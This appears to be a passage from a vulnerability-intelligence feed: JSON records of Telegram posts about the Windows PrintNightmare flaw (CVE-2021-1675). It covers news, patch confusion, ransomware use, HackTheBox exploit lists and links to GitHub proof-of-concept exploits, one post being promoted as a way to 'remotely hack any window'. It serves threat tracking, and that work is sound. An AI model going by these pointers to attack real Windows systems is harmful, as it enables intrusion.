\u041f\u043e\u0441\u043b\u0435 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438, \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043f\u0442\nhttps://github.com/cube0x0/CVE-2021-1675\n\n@dnevnik_infosec", "creation_timestamp": "2022-01-19T17:38:38.000000Z"}, {"uuid": "cbb3fbed-1e9f-4d95-95dd-55f58296200b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/129", "content": "HackTheBox:\n\n\u2014Easy Machines\u2014\n\nDriver - WinRM (evil-winrm), printnightmare CVE-2021-1675 (https://habr.com/ru/sandbox/156538/)\nhttps://0xdf.gitlab.io/2022/02/26/htb-driver.html\n\nSecret - JWT, Git source (tig), crush-dumps\nhttps://0xdf.gitlab.io/2022/03/26/htb-secret.html\n\nBackDoor - Wordpress eBook Dir Trav (https://www.exploit-db.com/exploits/39575), gdb exploit (https://www.exploit-db.com/exploits/50539, https://www.rapid7.com/db/modules/exploit/multi/gdb/gdb_server_exec/) \nhttps://0xdf.gitlab.io/2022/04/23/htb-backdoor.html\n\nPrevise - Backup, Site Reverse Shell, low-encrypted passwords\nhttps://0xdf.gitlab.io/2022/01/08/htb-previse.html\n\nBountyHunter - XXE, (root) NOPASSWD python code\nhttps://0xdf.gitlab.io/2021/11/20/htb-bountyhunter.html\n\nHorizontal - Strapi CMS 3.0.0 CVE-2019-18818/CVE-2019-19609 (https://www.exploit-db.com/exploits/50239, https://github.com/diego-tella/CVE-2019-19609-EXPLOIT), Laravel v8 (https://www.exploit-db.com/exploits/49424)\nhttps://0xdf.gitlab.io/2022/02/05/htb-horizontall.html\n\nOptimum - Windows 2012 (https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/, https://www.rapid7.com/db/modules/exploit/windows/local/ms16_032_secondary_logon_handle_privesc/)\nhttps://0xdf.gitlab.io/2021/03/17/htb-optimum.html\n\nLame - FTP Anonymous, SAMBA exploit 
(https://github.com/amriunix/CVE-2007-2447)\nhttps://0xdf.gitlab.io/2020/04/07/htb-lame.html\n\nJerry - Tomcat Default Cred, shell via .WAR\nhttps://0xdf.gitlab.io/2018/11/17/htb-jerry.html\n\nBlue - Win7 eternalblue (https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/)\nhttps://0xdf.gitlab.io/2021/05/11/htb-blue.html\n\nDevel - Microsoft IIS httpd 7.5 reverse shell via .ASPX, MS11-046 or ms10_015_kitrap0d (https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046)\nhttps://0xdf.gitlab.io/2019/03/05/htb-devel.html\n\nNetmon - PRTG Network Monitor 18.1.37.13946, Backup credentials, CVE-2018-9276 (https://github.com/A1vinSmith/CVE-2018-9276) / (https://www.exploit-db.com/exploits/46527) + evil-winrm\nhttps://0xdf.gitlab.io/2019/06/29/htb-netmon.html\n\nExplore (Android) - 59777 port CVE-2019-6447 (https://www.exploit-db.com/exploits/50070), SSH Creds on Photo, adb shell\nhttps://0xdf.gitlab.io/2021/10/30/htb-explore.html\n\nAntique - Telnet password via snmpget (https://www.irongeek.com/i.php?page=security/networkprinterhacking#JetDirect%20password%20notes), CUPS 1.6.1 (https://github.com/jpillora/chisel) \nhttps://0xdf.gitlab.io/2022/05/03/htb-antique.html\n\nReturn - evil-winrm, Server Operators in net user svc-printer /domain, sc.exe\nhttps://0xdf.gitlab.io/2022/05/05/htb-return.html\n\nGrandpa - CVE-2017-7269 (https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl/), SEImpersonalPrivilege Churrasco (https://github.com/Re4son/Churrasco/)\nhttps://0xdf.gitlab.io/2020/05/28/htb-grandpa.html\n\nBeep - ShellShock or Elastix 2.2.0 - 'graph.php' Local File Inclusion, (root) NOPASSWD nmap\nhttps://0xdf.gitlab.io/2021/02/23/htb-beep.html\n\nPandora - snmpwalk creds, CVE-2021-32099, Site Reverse Shell\nhttps://0xdf.gitlab.io/2022/05/21/htb-pandora.html\n\nPaper - WPS 5.2.3 - Cve-2019-17671 (https://www.exploit-db.com/exploits/47690, 
https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/), Chat Bot Dir Trav, CVE-2021-3560 (https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py)\nhttps://0xjin.medium.com/paper-hackthebox-write-up-2abca22d3b54\n\n\n#hackthebox #ctf", "creation_timestamp": "2022-06-18T10:22:36.000000Z"}, {"uuid": "db37c3d6-8694-456c-9a8f-21c40e4da1a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/YouPentest/4935", "content": "Understanding PrintNightmare Vulnerability | (CVE-2021-1675) and (CVE-2021-34527) TryHackMe\n\nhttps://www.youtube.com/watch?v=qRxzPOSlu3Y", "creation_timestamp": "2022-05-29T13:08:28.000000Z"}, {"uuid": "998c35f6-c5d5-4576-95e6-029e8565da83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/YouPentest/2345", "content": "VE-2021-34527 - PrintNightmare - Server 2016 PoC Demonstration\n\nhttps://www.youtube.com/watch?v=qU3vQ-B-FPY\n\nhttps://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py\n\n#PrintNightmar", "creation_timestamp": "2023-07-17T07:50:29.000000Z"}, {"uuid": "761f19b3-b745-4cd5-a64b-704bec507f5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/YouPentest/4833", "content": "Understanding PrintNightmare Vulnerability | (CVE-2021-1675) and (CVE-2021-34527)\n\nhttps://www.youtube.com/watch?v=qRxzPOSlu3Y", "creation_timestamp": "2022-05-20T09:00:08.000000Z"}, {"uuid": "d0ce83bc-1088-4e1a-ba08-f687f44fcb42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/RYetcLsOmihSjL6vrmK8b2EEcP3aYfaPpeqAArUjps5i1kk", "content": "", "creation_timestamp": "2025-07-25T03:00:05.000000Z"}, {"uuid": "fb6a5217-2b03-435d-a3b7-df574302a01d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/80", "content": "#remidiation #detect\nhttps://github.com/LaresLLC/CVE-2021-1675", "creation_timestamp": "2023-01-29T20:34:55.000000Z"}, {"uuid": "b0930e6f-cef1-4095-a323-bd0cd72a1bc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/250", "content": "GitHub monitoring alert!!!\n\nUpdated: CVE-2021\nDescription: Local exploit for CVE-2021-1675\nURL: https://github.com/tacbliw/PrintNightmare-LPE", "creation_timestamp": "2021-08-02T10:24:14.000000Z"}, {"uuid": "41576334-6e8c-48c1-9290-f6ed1e95cb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/ctinow/36051", "content": "PoC exploit for CVE-2021-1675 RCE started circulating online\n\nhttps://ift.tt/3jn7PjL", "creation_timestamp": "2021-06-29T19:16:26.000000Z"}, {"uuid": "d49283ee-0a4c-42b7-87d6-cf1192583d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/ctinow/36539", "content": "Quick look at CVE-2021-1675 & CVE-2021-34527 (aka PrintNightmare)\n\nhttps://ift.tt/3qUGxTr", "creation_timestamp": 
"2021-07-08T07:05:33.000000Z"}, {"uuid": "e5ec05f7-c30d-43e6-a099-66f0871b52e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/ctinow/36538", "content": "Quick look at CVE-2021-1675 & CVE-2021-34527 (aka PrintNightmare)\n\nhttps://ift.tt/3qUGxTr", "creation_timestamp": "2021-07-08T07:05:32.000000Z"}, {"uuid": "f89a6554-7449-4179-a328-5ae85136ea80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/arpsyndicate/1351", "content": "#ExploitObserverAlert\n\nCVE-2021-1675\n\nDESCRIPTION: Exploit Observer has 257 entries related to CVE-2021-1675. Windows Print Spooler Remote Code Execution Vulnerability\n\nFIRST-EPSS: 0.962600000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-05T01:07:55.000000Z"}, {"uuid": "907b32aa-8de2-47bc-bfef-d8543f01839d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/arpsyndicate/1590", "content": "#ExploitObserverAlert\n\nCVE-2021-1675\n\nDESCRIPTION: Exploit Observer has 258 entries related to CVE-2021-1675. 
Windows Print Spooler Remote Code Execution Vulnerability\n\nFIRST-EPSS: 0.959820000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-10T01:13:39.000000Z"}, {"uuid": "886d06d0-d52e-4990-b2fe-3630a9a8e725", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/297", "content": "#Python implementation for #PrintNightmare #CVE-2021-1675 / #CVE-2021-34527\n\nhttps://github.com/ly4k/PrintNightmare", "creation_timestamp": "2021-10-17T15:37:17.000000Z"}, {"uuid": "9145f2b7-74dd-41c2-97dd-8491398c5b80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/9Ljs1ig5D-hALQ-rtNcTXj7o6l-CuPeYn7S0FtIGoF5htQ", "content": "", "creation_timestamp": "2021-06-30T10:31:32.000000Z"}, {"uuid": "6f35caa2-c754-4eb4-b53e-164fa73b88d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "Telegram/ZiRpVpQIVhTPFUKYCmmHC--OlCXSQCYSlhQFKiQtKk5hcQ", "content": "", "creation_timestamp": "2021-07-01T13:56:10.000000Z"}, {"uuid": "d4b2c137-d8f4-497c-a522-af4b490d9f85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/RalfHackerChannel/1068", "content": "PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service\n\nhttps://github.com/afwu/PrintNightmare\n\nhttps://github.com/cube0x0/CVE-2021-1675\n\nhttps://github.com/calebstewart/CVE-2021-1675\n\n#exploit #git", "creation_timestamp": "2021-07-02T05:59:36.000000Z"}, 
{"uuid": "327a70e8-f42d-4b2c-ae8c-cd6a9d8b7ddc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/true_secator/2001", "content": "While the whole infosec community takes turns with Microsoft cutting out ever more PrintNightmare holes (the bug group CVE-2021-1675, CVE-2021-34527 and CVE-2021-36958), the hacker industry is successfully adopting its colleagues' best practices, adding the corresponding exploits for breaking into Windows servers to its arsenal.\n\nAttackers use these security flaws for local privilege escalation (LPE) to spread malware as Windows domain administrators via remote code execution (RCE) with SYSTEM privileges.\n\nThe other day Crowdstrike caught the Magniber ransomware gang doing this; it now uses PrintNightmare exploits to deploy payloads in attacks on South Korean victims. It has been established that after compromising servers that lack the fix, Magniber removes an obfuscated DLL loader, which is first injected into a process and then unpacked to perform local file traversal and encrypt files on the compromised device.\n\nMagniber has been active since October 2017; it was originally spread through malvertising using the Magnitude Exploit Kit (EK) as the successor to the Cerber ransomware, and is now delivered via Magnitude EK to devices running Internet Explorer with an unpatched CVE-2020-0968. The group focuses on South Korea, China, Taiwan, Hong Kong, Singapore, Malaysia and others. And over the last 30 days it has become especially active; now it is clear why.\n\nThe Vice Society ransomware crew (linked to HelloKitty) has also latched onto PrintNightmare attacks, using the vulnerabilities for lateral movement across its victims' networks. The gang's activity came into the sights of Cisco Talos, who saw Vice Society deploy a malicious dynamic-link library (DLL) to exploit the two bugs CVE-2021-1675 and CVE-2021-34527.\n\nAs is known, Vice Society encrypts Windows and Linux systems using OpenSSL (AES256 + secp256k1 + ECDSA) and targets small or medium-sized victims; it practices double extortion, with particular attention paid to educational institutions. Its TTPs include deleting backups to prevent victims from restoring encrypted systems and bypassing Windows protections to steal credentials and escalate privileges.\n\nIn addition, Conti too has very recently joined the newcomers in the feed, compromising Windows servers by means of the much-loved PrintNightmare.\n\nAnd in general this list will grow fairly quickly, as will the list of their victims. The trend, as they say, is plain to see.", "creation_timestamp": "2021-08-13T16:07:13.000000Z"}, 
{"uuid": "ad2a842d-ceb3-418d-908b-a8993737e277", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/true_secator/1880", "content": "So, the logical continuation of the story of the PrintNightmare vulnerability in the Windows print spooler spoolsv.exe.\n\nMicrosoft did after all assign the bug a new CVE-2021-34527, effectively confirming that this is a completely fresh hole, distinct from CVE-2021-1675, which was in fact closed by the June security patch. In parallel, Microsoft reported that the vulnerability affects all versions of Windows, and also that PrintNightmare is already being exploited by hackers in the wild (no wonder, the PoC has been public for a long time).\n\nMicrosoft's official mitigation recommendations are available at the link provided.", "creation_timestamp": "2021-07-02T10:23:45.000000Z"}, 
{"uuid": "9f40c4f0-0ee2-4d39-a880-4a7e56471481", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/true_secator/1873", "content": "And as a follow-up to the recent post about the unpatched CVE-2021-1675", "creation_timestamp": "2021-06-30T21:00:11.000000Z"}, 
{"uuid": "33247d38-50da-4630-b424-143d92e7da9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/1871", "content": "Oh, fuck....\n\nHere they write that Microsoft's June security patch did not close CVE-2021-1675 aka PrintNightmare, which we wrote about yesterday and for which a PoC appeared the other day.\n\nA reminder that CVE-2021-1675 is a vulnerability leading to remote code execution (RCE) in the print spooler spoolsv.exe (Print Spooler) in Windows. Print Spooler is enabled by default on all machines.\n\nWhat we have: a critical unpatched RCE vulnerability and a PoC for exploiting it that has ended up public. What could possibly go wrong?\n\nAnd now seriously: if this is true (and we expect to find out in the coming hours), then this is an absolute fucking disaster. You know we don't swear often, but this is exactly that case. The last time we saw something like this was in Stuxnet. \n\nWe recommend preventively shutting off spoolsv.exe. \n\nP.S. While we were writing this post, several tweets saying that the patch does not fix CVE-2021-1675 disappeared, although others remained. This is very strange.", "creation_timestamp": "2021-06-30T15:43:02.000000Z"}, 
{"uuid": "0d0bd7f8-456d-4a5b-a8d5-b02a3f94dc77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/true_secator/1866", "content": "The Record writes that today three Chinese researchers from Sangfor published on GitHub a full technical write-up of CVE-2021-1675 and a corresponding PoC. They named the bug PrintNightmare.\n\nCVE-2021-1675, fixed in the June Windows patch, is a hole in the print spooler spoolsv.exe. Exploiting the vulnerability leads to remote code execution (RCE) and effectively allows taking full control of the attacked system.\n\nYesterday the Chinese researchers from QiAnXin posted a low-resolution GIF on their Twitter showing an exploit for the bug. Because of this, the original Chinese researchers from Sangfor decided to publish their PoC, which, according to them, they developed independently to take part in the Tianfu Cup competition. \n\nA few hours later they thought better of it and removed the materials from GitHub, but by then the technical details and the PoC had already been copied away. We therefore expect a CVE-2021-1675 exploit to appear publicly in the near future.\n\nThe conclusion, really, is one: if you have not updated your Windows machines, do so as quickly as possible. RCE, you know, is not like watching the Russian national football team play; it is far more painful.", "creation_timestamp": "2021-06-29T16:49:28.000000Z"}, 
{"uuid": "e609b0fe-78dd-47c5-bf83-79696f303b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/true_secator/1874", "content": "The story of the critical PrintNightmare vulnerability is getting curiouser and curiouser, as Carroll's Alice would say.\n\nInitially the researchers from China's Sangfor, who published the technical details and a PoC for the bug, assumed that the vulnerability they had found was CVE-2021-1675 itself. And CVE-2021-1675 had already been closed by Microsoft's June patch.\n\nHowever, according to information that has emerged, the hole the Chinese researchers found is not CVE-2021-1675 at all; it is an entirely separate 0-day. If so, that explains yesterday's case, in which PrintNightmare exploitation kept working on fully patched Windows.\n\nIncidentally, Delpy has already demonstrated a successful exploit for the bug, so it will not be long before it is used in Mimikatz.\n\nA reminder that PrintNightmare allows RCE from the position of any authenticated user. So the recommendation is, in fact, the same as yesterday: urgently shut off spoolsv.exe, especially on domain controllers.", "creation_timestamp": "2021-07-01T10:59:57.000000Z"}, 
{"uuid": "c8008171-42f4-4463-8a48-971433cabd62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/Ou-Kzzl3nLkADt9_Yue4jZMgPKq1aQqAvVswhjnvvkETSg", "content": "", "creation_timestamp": "2021-07-16T14:35:20.000000Z"}, 
{"uuid": "2d3203d9-f02f-4bfc-b187-e38e0ad5c1d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/crackcodes/121", "content": "https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py\n\u261d\ufe0f\u261d\ufe0f\u261d\ufe0fRemotely hack any window", "creation_timestamp": "2021-07-10T05:15:39.000000Z"}, 
{"uuid": "b1cd5669-b217-4774-8186-75edc0ee3682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/pwnwiki_zhchannel/725", "content": "CVE-2021-1675 Windows Print Spooler remote code execution vulnerability\nhttps://www.pwnwiki.org/index.php?title=CVE-2021-1675_Windows_Print_Spooler%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E", "creation_timestamp": 
"2021-09-21T04:42:21.000000Z"}, {"uuid": "43dfa437-1453-4faf-b8f1-41e7baba8db2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/information_security_channel/44549", "content": "Windows Admins Scrambling to Contain 'PrintNightmare' Flaw Exposure\nhttp://feedproxy.google.com/~r/securityweek/~3/IsQMasJIps8/windows-admins-scrambling-contain-printnightmare-flaw-exposure\n\nWindows network administrators are scrambling to contain the fallout from the release of proof-of-concept code for a nasty Windows Print Spooler vulnerability (https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675) that exposes Windows servers to remote code execution attacks.\nread more (https://www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure)", "creation_timestamp": "2021-06-30T16:38:46.000000Z"}, {"uuid": "a3d9f1ec-55d3-4fe8-bcae-2b1f2011d78a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/information_security_channel/44635", "content": "Did Microsoft Botch the PrintNightmare Patch?\nhttp://feedproxy.google.com/~r/securityweek/~3/PqEJjMi6APQ/did-microsoft-botch-printnightmare-patch\n\nJust days after shipping an emergency Windows update to cover a dangerous code execution flaw (CVE-2021-1675 (https://www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure)) in the Print Spooler service, Microsoft is investigating a new set of claims that its so-called \u2018PrintNightmare\u2019 patch has not properly fixed the underlying vulnerability.\nread more (https://www.securityweek.com/did-microsoft-botch-printnightmare-patch)", "creation_timestamp": "2021-07-09T17:30:01.000000Z"}, {"uuid": "f3a5595e-fea1-4638-9e99-776e8502e615", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/1327", "content": "\ud83d\udd25 Researchers publish a proof-of-concept exploit for a critical vulnerability (CVE-2021-1675) affecting Microsoft Windows operating systems.\n\nDetails \u2014 https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html", "creation_timestamp": "2021-06-30T13:36:01.000000Z"}, {"uuid": "6c0b45a6-85e2-41cb-8760-e8988e0798c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/thehackernews/1333", "content": "\ud83d\udd25 WATCH OUT! Microsoft warns of critical PrintNightmare RCE vulnerability (CVE-2021-34527) being exploited in the wild.\n\nDetails: https://thehackernews.com/2021/07/microsoft-warns-of-critical.html\n\nIt is separate from the Windows Print Spooler issue (CVE-2021-1675) Microsoft patched recently.", "creation_timestamp": "2021-07-02T07:44:31.000000Z"}, {"uuid": "ae68812d-dcb0-4035-a185-3af520d8c05b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/xakep_ru/12002", "content": "HTB Driver. 
Exploiting PrintNightmare and making a malicious SCF #htb #driver #printnightmare #scf #\u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u0430\u043c\n\nToday you and I will look at the PrintNightmare vulnerability, which allows privilege escalation in Windows through a bug in the printing system (CVE-2021-1675), make a malicious SCF file that will help us obtain the NTLM hash of a user's password, and work through the Driver machine from the Hack The Box platform.\n\nhttps://xakep.ru/2022/02/28/htb-driver/", "creation_timestamp": "2022-02-28T16:00:54.000000Z"}, {"uuid": "0afd1911-59e1-4e63-83fc-8f47a027b546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/BlueRedTeam/1276", "content": "CVE-2021\n\nCVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege 
Escalation)\n\nhttps://github.com/fumamatar/NimNightmare-\n\n@BlueRedTeam", "creation_timestamp": "2022-08-19T09:32:59.000000Z"}, {"uuid": "7657a766-8568-4d0e-aa98-7acaeaae539e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/BlueRedTeam/1277", "content": "CVE-2021\nCVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)\n\nhttps://github.com/fumamatar/NimNightmare\n\n@BlueRedTeam", "creation_timestamp": "2021-12-05T16:33:42.000000Z"}, {"uuid": "6c07bfde-957d-4b28-843c-6530b87a793d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/SecLabNews/10485", "content": "A number of cybersecurity researchers have reported that the patch Microsoft released to fix the CVE-2021-1675 vulnerability addresses only the privilege-escalation attack vector. 
Computer systems that received the patch still remain vulnerable to remote code execution, because Microsoft appears to have combined two different problems under one and the same CVE identifier.\n\n \n\nhttps://www.securitylab.ru/news/521822.php", "creation_timestamp": "2021-07-01T16:46:39.000000Z"}, {"uuid": "2984438b-cd52-40b0-9fe9-b2c6554d2852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/SecLabNews/10487", "content": "Microsoft has officially confirmed that the much-publicized remote code execution vulnerability in the Windows Print Spooler service known as PrintNightmare and the CVE-2021-1675 vulnerability, which the tech giant fixed last month, are two different problems. 
The company has also detected attempts to exploit PrintNightmare in real-world attacks.\n\n \n\nhttps://www.securitylab.ru/news/521857.php", "creation_timestamp": "2021-07-02T12:15:03.000000Z"}, {"uuid": "7170eada-07bb-44a4-858c-b67dcccbf122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3750", "content": "#Blue_Team_Techniques\n1. CVE-2021-1675/CVE-2021-34527 Detection Info\nhttps://github.com/LaresLLC/CVE-2021-1675\n]-> Restricting the ACLs:\nhttps://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available\n]-> Mitigation:\nhttps://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c\n\n2. 
Fail2exploit: a security audit of Fail2ban\nhttps://securitylab.github.com/research/Fail2exploit", "creation_timestamp": "2021-07-03T18:33:01.000000Z"}, {"uuid": "e9988cbd-0f3e-4cd4-b5cf-a42249d0a7dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3732", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (June 1-30)\nCVE-2021-1675 - Windows Print Spooler EoP\nhttps://t.me/cybersecuritytechnologies/3723\nCVE-2021-21985 - vSphere Client RCE\nhttps://t.me/cybersecuritytechnologies/3493\nCVE-2021-3560 - Privilege escalation with polkit\nhttps://t.me/cybersecuritytechnologies/3587\nCVE-2021-28476 - Hyper-V RCE in vmswitch.sys\nhttps://t.me/cybersecuritytechnologies/3514\nCVE-2020-3580 - XSS in Cisco ASA\nhttps://www.helpnetsecurity.com/2021/06/29/cve-2020-3580-exploit\nCVE-2021-31955/31956 - Windows NTFS EoP/Kernel Information Disclosure\nhttps://github.com/mavillon1/CVE-2021-31955-POC\nhttps://t.me/cybersecuritytechnologies/3705\nCVE-2021-33739 - MS DWM Core Library EoP\nhttps://t.me/cybersecuritytechnologies/3581\nCVE-2021-27850 - Apache Tapestry RCE\nhttps://t.me/cybersecuritytechnologies/3694\nCVE-2020-36289 - Atlassian Jira Unauth User Enum\nhttps://mobile.twitter.com/i/web/status/1402644004781633540", "creation_timestamp": "2021-07-01T11:03:01.000000Z"}, {"uuid": "f7cf42a4-d360-4b8e-ab21-945550a7ed81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/3723", "content": 